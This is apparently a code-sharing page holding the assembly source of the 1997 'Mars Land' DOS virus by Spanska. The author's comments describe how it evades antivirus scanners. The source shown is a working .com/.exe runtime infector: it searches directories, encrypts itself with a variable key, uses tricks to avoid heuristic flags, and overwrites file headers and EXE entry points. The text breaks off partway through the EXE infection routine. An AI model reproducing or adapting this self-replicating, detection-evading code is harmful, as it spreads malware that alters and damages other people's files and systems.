📄 marsland.asm
字号:
; MARS LAND virus by Spanska
; Called Spanska.1500 by AV people
; This is my third virus
;
;*********************************************************************
;
; THIS VIRUS IS DEDICATED TO... uhhh... nobody this time :)
;
; Or maybe to all the virus coders who do not destruct with
; their creations. I've put the phrase "Coding a virus can
; be creative" to show that an original infection routine,
; a funny payload or a new mutation engine, are far more
; interesting for the coder and for other people than stupid
; destruction.
; I worked some weeks on this virus graphic effect. A simple
; routine to delete a hard drive would have taken me one
; minute to copy/paste it. So, no interest.
;
; Greets to Griyo (best virus coder on this side of the
; galaxy), MrSandman and other guys from 29A (the best group!),
; to Roadkill, Slacker, and friends on IRC (from Luxembourg,
; Spain, Sweden and everywhere), Poltergst and Cicatrix for
; their job on the web. And to the very few french virus
; coders, or even fighters (salut Jean-Luc!).
;
;******************************contact me at el_gato@rocketmail.com***
;
; At the time it was released (march 97), the detection was:
; TBSCAN flags: c?K on .exe's, nothing on .com's
; FPROT: "ear variant" on unencrypted generation 0, nothing after
; DrSolly Findvirus: nothing
; DrWeb: nothing
; AVP: nothing
; (i saw in newsgroups that a scanner i can't remember flags it
; sometimes like a Whale variant, never happened to me)
;
; generation zero size: 1660
; virus size: 1500
;
; compile it with TASM /m2 and TLINK /t
;
; Properties:
; simple .com/.exe runtime infector
; file search routine is essentially derived from my NO PASARAN virus
; not destructive
; encrypted with variable key
; infects 3 .com and 3 .exe each run
; infects current directory, than upper directories
; when it reaches the root, it starts infecting all "level1" subdirectories
; does not infect files <500 bytes, nor command.com
; the VGA graphic bomb (a 3D voxel effect) explodes
; when minutes=30 and seconds<30 (1/120)
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h
;
;---------------fake host code--------------------
;
hote:
call virus ;jump to viral code (avoid J flag)
signature db "ee" ;virus signature
nop ;
nop ;fake host
nop ;
nop ;
mov ah, 4ch ;finished
mov al,0 ;go to
int 21h ;DOS
;**********************************************************************
; START OF VIRAL CODE
;**********************************************************************
virus: ;virus starts here
;
;-------------in case of an exe, let's work in cs--------------
;
push ds ;save ds on stack... Don't forget it...
push cs ;we are in the virus segment
push cs ;so we have to adjust
pop es ;ds and es to point
pop ds ;to this segment
;
;---------------get delta offset----------------------------
;
call $+3 ;modified classic
delta: ;routine to
mov bp, sp ;avoid flag E
mov ax, [bp] ;
add word ptr [bp], decrypte-delta ;thanks Slacker's Theory
sub ax, offset delta ;of Code through Obscurity!
mov bp, ax
ret
clef db 0 ;the crypting key
;=== this stosb ===
;=== when outside decrypt loop ===
;=== does not flag # ===
baise_flag_cryptage: ;===
stosb ;=========>>> NO MORE FLAG "#" !!!!!
ret ;===
;===================================
;
;----------------------decrypting routine-------------------------
;
decrypte:
mov dl, [bp+offset clef] ;actual key in dl
mov cx, fin_cryptage - debut_cryptage ;number of bytes to decrypt
lea si, [bp+offset debut_cryptage] ;si=start of zone to decrypt
mov di, si ;di=start of zone to decrypt
xor_loop: ;decrypt loop
lodsb ;get byte to decrypt in al
nop ;just here to make a 1500 bytes virus ;)
xor al, dl ;the byte is decrypted with the key
call baise_flag_cryptage ;call the outside stosb (avoid flag #)
loop xor_loop ;finish decryption
debut_cryptage: ;start of the crypted zone
;
;------transfert of infected file information on another zone---------
; (for final normal execution of the program)
;
lea si, [bp+offset pip] ;from this zone
lea di, [bp+offset vip] ;to this zone
movsw
movsw ;we transfer 8 bytes
movsw
movsw
;
;---------------initialisation to 0 of directory counter--------------
; and 2 infection counters (com and exe)
;
lea di, [bp+offset phase] ;they are here
xor ax, ax ;put them to zero
stosw ;(3 counters = 3 bytes)
stosb
;
;--------------------remember current repertory------------------
;
lea si, [bp+offset repert] ;si on good memory zone
xor dl, dl ;dl=0 is default unit
mov ah, 47h ;47h=current dir in memory
int 21h ;go!
;
;---------------DTA go to a predefined zone in memory-------------
;
push 1a00h ;push/pop to
pop ax ;avoid flag F
lea dx, [bp+offset dta]
int 21h
;**********************************************************************
; .COM INFECTION
;**********************************************************************
;
;-----------------find first .com file-------------------------
;
recherche:
mov cx, 0007h ;attributes
lea dx, [bp+offset file_com] ;file mask for a .com
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_suivant ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
;
;---------------------find next .com file-------------------------
;
fichier_suivant:
lea dx, [bp+offset file_com] ;
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h
int 21h ;file found?
jnc saut5 ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
saut5:
;
;---------------verify if extension is really .com---------------------
; (it's made to avoid flag S with tbscan)
;
sauter_suivant:
call verifie_extension ;call verification routine
cmp word ptr [si], "MO" ;second and third letters are "OM"?
jne fichier_suivant ;no => find next .com file
;
;----------------verify if it's command.com----------------------------
;
cmp word ptr [bp+offset dta+1eh+2], "MM" ;test 3rd and 4th letter
je fichier_suivant ;yes => find next file
;
;--------------attributes to 0 to infect special files-------------
;
call attrib_a_zero
;
;--------------------open file, and verify header-----------------------
;
call ouvre_et_verif_header
jmp fichier_suivant ;if header not good (already infected)
;we get here and search another file
;if header good we get here on routine return
;
;--------transfer 5 first bytes of the .com to another zone----------
;
lea si, [bp+offset exehead]
lea di, [bp+offset cinq_octets]
movsw
movsw
movsb
;
;-----------before infection, change of the crypting key-----------
;
call change_clef
;
;------------disk file pointer at the end-----------
;
mov ax, 4202h
xor cx, cx
mov dx, cx
int 21h
;
;-----------------------infection-----------------------------------
;
call infecte
;
;--overwrite 5 first bytes on the disk by jump to virus code + signature---
;
;1) move disk file pointer to start of the file
;
call pointeur_debut
;
;2) calculate initial jump and write all on a temp zone in memory
;
lea di, [bp+offset cinq_octets]
mov al, 0E8h ;E8=opcode of CALL
stosb
mov ax, word ptr [bp+offset dta+1ah] ;ax=file size
sub ax, 3 ;this is because of the CALL
stosw
mov ax, "ee" ;signature
stosw
;
;3) overwrite 5 first bytes on the file
;
mov cx,5
lea dx, [bp+offset cinq_octets]
call ecrit_fichier
;
;----------------restore time/date of the file--------------------
;
call restaure_time
;
;------------close file and restore file attributes--------------------
;
call remise_en_etat
;
;--------verify how many .com files we have infected------------------
;
mov byte ptr cl, [bp+offset compteur_com] ;infection counter in cl
inc cl ;one more
cmp cl, 3 ;have we infected 3 .com files?
je infecte_exe ;yes => let's infect .exe now
mov byte ptr [bp+offset compteur_com], cl ;no => write new value of counter
;
;-----------------let's infect a new .com file------------------
;
jmp fichier_suivant ;go infect next file
;**********************************************************************
; .EXE INFECTION
;**********************************************************************
infecte_exe:
;
;------------------find first .exe file-------------------------
;
recherche_exe:
mov cx, 0007h ;attributes
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_exe_suivant ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper directory
;
;------------------find next file-------------------------
;
exe_suivant:
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h ;attributes
int 21h ;file found?
jnc saut_exe ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper direcory
saut_exe: ;
;
;---------------verify if extension is really .com---------------
; (it's made to avoid flag S with tbscan)
;
sauter_exe_suivant:
call verifie_extension ;call verification routine
cmp word ptr [si], "EX" ;second and third letters are "OM"?
jne exe_suivant ;no => find next .exe file
;
;------------attributes to 0 to infect special files-------------
;
call attrib_a_zero
call ouvre_et_verif_header
jmp exe_suivant ;if header not good (already infected or
;windows file) we get here and search
;another file
;if header good, we get here
;
;------------verify that it's really a .exe with MZ header----------------
;
lea si, [bp+offset exehead]
lodsw
add ah, al ;to avoid flag Z
cmp ah, 167 ;(M+Z in ASCII is 167)
jne exe_suivant ;if it's not MZ or ZM, find next .exe file
;
;-----------before infection, change the crypting key-----------
;
call change_clef
;
;----------------save old .exe header values-------------------------
;
lea di, [bp+offset pIP]
mov ax, word ptr [bp+ exehead+14h] ;save IP
stosw
mov ax, word ptr [bp+ exehead+16h] ;save CS
stosw
mov ax, word ptr [bp+ exehead+0Eh] ;save SS
stosw
mov ax, word ptr [bp+ exehead+10h] ;save SP
stosw
;
;---------disk file pointer at the end (return dx:ax = size)---------
;
mov bx, [bp+offset handle]
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h
push ax ;save size on stack
push dx ;useful for next calculations
;
;----------------calculate new cs:ip---------------------------------
;
push ax
mov ax, word ptr [bp+exehead+08h]
mov cl, 4
shl ax, cl
mov cx, ax
pop ax
sub ax, cx
sbb dx, 0
mov cl, 0Ch
shl dx, cl
mov cl, 4
push ax
shr ax, cl
add dx, ax
shl ax, cl
pop cx
sub cx, ax
mov word ptr [bp+ exehead+14h], cx ;new calculated values
mov word ptr [bp+ exehead+16h], dx ;put in the header zone
mov word ptr [bp+ exehead+0Eh], dx ;in memory
mov word ptr [bp+ exehead+10h], 0FFFEh
;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -